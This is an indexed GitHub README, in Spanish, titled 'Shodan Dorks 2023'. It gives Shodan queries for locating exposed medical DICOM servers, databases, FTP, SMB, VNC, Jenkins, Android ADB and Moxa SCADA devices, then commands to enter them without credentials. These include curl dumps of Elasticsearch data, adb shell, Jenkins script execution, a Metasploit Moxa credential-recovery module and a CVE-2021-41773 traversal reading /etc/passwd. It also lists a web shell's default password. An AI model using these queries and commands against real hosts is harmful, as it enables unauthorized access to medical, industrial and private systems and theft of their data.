Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/HernanRodriguez1/Dorks-Shodan-2023
Shodan Dorks 2023
https://github.com/HernanRodriguez1/Dorks-Shodan-2023
Last synced: about 6 hours ago
JSON representation
Shodan Dorks 2023
- Host: GitHub
- URL: https://github.com/HernanRodriguez1/Dorks-Shodan-2023
- Owner: HernanRodriguez1
- Created: 2023-08-31T02:40:23.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2023-09-01T19:24:31.000Z (about 1 year ago)
- Last Synced: 2023-09-02T18:52:43.893Z (about 1 year ago)
- Language: Python
- Homepage:
- Size: 89.8 KB
- Stars: 55
- Watchers: 2
- Forks: 9
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-ip-search-engines - Shodan Dorks 2023
- awesome-ip-search-engines - Shodan Dorks 2023
README
# Shodan Dorks 2023
Recopilación de Querys de shodan con scripts personalizados :)
# DICOM
El estándar DICOM (Digital Imaging and Communications in Medicine) es un estándar utilizado en la industria médica para la gestión, almacenamiento y transmisión de imágenes médicas, como radiografías, tomografías computarizadas (TC), imágenes de resonancia magnética (IRM), entre otras.
```sh
"DICOM Server Response" port:104
```
```sh
python3 Dicom.py
```
# Elasticsearch
Elasticsearch es un motor de búsqueda y análisis distribuido, de código abierto, basado en Lucene. Se utiliza para indexar, buscar y analizar grandes volúmenes de datos en tiempo real. Está diseñado para manejar datos no estructurados o semiestructurados y es especialmente útil para casos de uso en los que se requiere búsqueda y análisis de texto, logística, monitoreo y análisis de registros, y más
```sh
port:"9200" elastic: "Total Size:"
```
```sh
curl -X GET "http://192.x.x.153:9200/_cat/indices?v"
curl -X GET "http://192.x.x.153:9200/.monitoring-beats-7-2023.08.30"
curl -X GET "http://192.x.x.153:9200/_search?pretty=true"
```
```sh
python3 elastic.py -t 192.x.x.153
```
## Access FTP Anonymous
El acceso FTP anónimo es una forma de conectarse a un servidor FTP sin proporcionar credenciales de autenticación específicas.
```sh
"220" "230 Login successful." port:21
230 'anonymous@' login ok
"Anonymous+access+allowed" port:"21"
```
```sh
shodan search :"220" "230 Login successful." port:21 --fields ip_str --separator " " | awk '{print $1}' | cat > ips.txt
```
```sh
python3 ftp.py -l ips.txt
```
# Authentication Disabled SMB
La autenticación SMB (Server Message Block) sin credenciales, también conocida como acceso SMB anónimo, permite a los usuarios acceder a recursos compartidos en una red sin proporcionar nombres de usuario ni contraseñas. Esto puede ser útil para acceder a carpetas compartidas que se han configurado para permitir el acceso anónimo.
```sh
"Authentication: disabled" port:445 product:"Samba"
```
```sh
smbclient -L //200.x.x.29/ -N
smbclient //200.x.x.29/info
```
## Access authentication disabled VNC
Esto significa que el servidor VNC está configurado para permitir conexiones sin requerir autenticación.
```sh
"authentication disabled" port:5900,5901
```
```sh
vncviewer -passwd none 91.x.x.238
```
## Access authentication disabled MongoDB
Esto significa que el servidor NoSQL MongoDB está configurado para permitir conexiones sin requerir autenticación.
```sh
"MongoDB Server Information" port:27017 -authentication
"Set-Cookie: mongo-express=" "200 OK"
```
```sh
mongo --host 139.x.x.5
```
## Access Jenkins
Se puede visualizar componentes del servicio Jenkins, ejecutar scripts, etc.
```sh
http.component:"jenkins"
title:"Dashboard [Jenkins]"
html:"Dashboard Jenkins"
```
```sh
add /script
print "uname -a".execute().text
```
## Access devices ADB
Es una aplicación de terminal que le permite conectarse al servicio ADB shell de otros dispositivos Android a través de la red.
```sh
shodan search :Android Debug Bridge port:5555 "Name:" --fields ip_str --separator " " | awk '{print $1}' | cat > ips.txt
```
```sh
python3 adb.py
```
```sh
adb devices
```
```sh
adb -s 59.x.x.112:5555 shell
```
## Access devices SCADA Moxa
Sistema SCADA que utiliza productos de la marca Moxa para establecer la conectividad y la comunicación con los dispositivos industriales que están siendo monitoreados y controlados en una infraestructura crítica o proceso industrial.
```sh
"Moxa Nport Device" Status: Authentication enabled port:"4800"
"Moxa Nport Device" Status: Authentication disabled port:"4800"
shodan search --separator , --fields ip_str,port,data "Moxa Nport" | awk '{print $1,$2,$3}' FS=":" | tr '\\', ' ' | awk '{print $1,$7,$8}' | column -t | ccze -A
```
```sh
use auxiliary/admin/scada/moxa_credentials_recovery
set FUNCTION CREDS
set rport 4800
set rhosts 212.x.x.14
run
```
```sh
telnet 212.x.x.14
```
## Exploit Infrastructure RCE CVE-2020-0796
La vulnerabilidad CVE-2020-0796 se refiere a una vulnerabilidad de ejecución de código remoto (RCE, por sus siglas en inglés) que afecta al protocolo de compartición de archivos SMBv3 (Server Message Block version 3). SMB es un protocolo utilizado para compartir archivos, impresoras y otros recursos en redes de computadoras. La versión 3 (SMBv3) es una versión moderna de este protocolo utilizada en sistemas operativos Windows.
Esta vulnerabilidad se conoció coloquialmente como "SMBGhost" o "CoronaBlue" y fue anunciada en marzo de 2020.
```sh
vuln:CVE-2020-0796
country:pe port:445
```
## Exploit Web RCE CVE-2021-41773
```sh
shodan search :apache 2.4.49 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | cat > url.txt
```
```sh
curl -k http://210.x.x.7/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```
## Electronic measure
```sh
"Server: EIG Embedded Web Server" "200 Document follows"
```
## Search Web shell
```sh
html:"wso.php"
```
webshell as default fa769dac7a0a94ee47d8ebe021eaba9e has a match password ghost287
## Search Backup Files
```sh
html:"web.zip"
"web.zip"
```
## OS Windows Obsolete
Tener sistemas Windows obsoletos y sin soporte puede conllevar una serie de peligros y riesgos significativos para la seguridad, la estabilidad y la eficiencia de tus sistemas y datos.
```sh
os:"Windows 5.0" – Windows 2000; support end 2010.
os:"Windows 5.1" – Windows XP; support end 2014.
os:"Windows 2003" – Windows Server 2003; support end 2015.
os:"Windows Vista"– Windows Vista; support end 2017.
os:"Windows 2008" – Windows Server 2008; support end 2020.
os:"Windows 7" – Windows 7; support end 2020.
os:"Windows 8" – Windows 8; support end 2016.
os:"Windows 2011" – Windows Home Server 2011; support end 2016.
os:"Windows 8.1" – Windows 8.1; support end 2018.
os:"Windows 2012" – Windows Server 2012; support end 2018.
```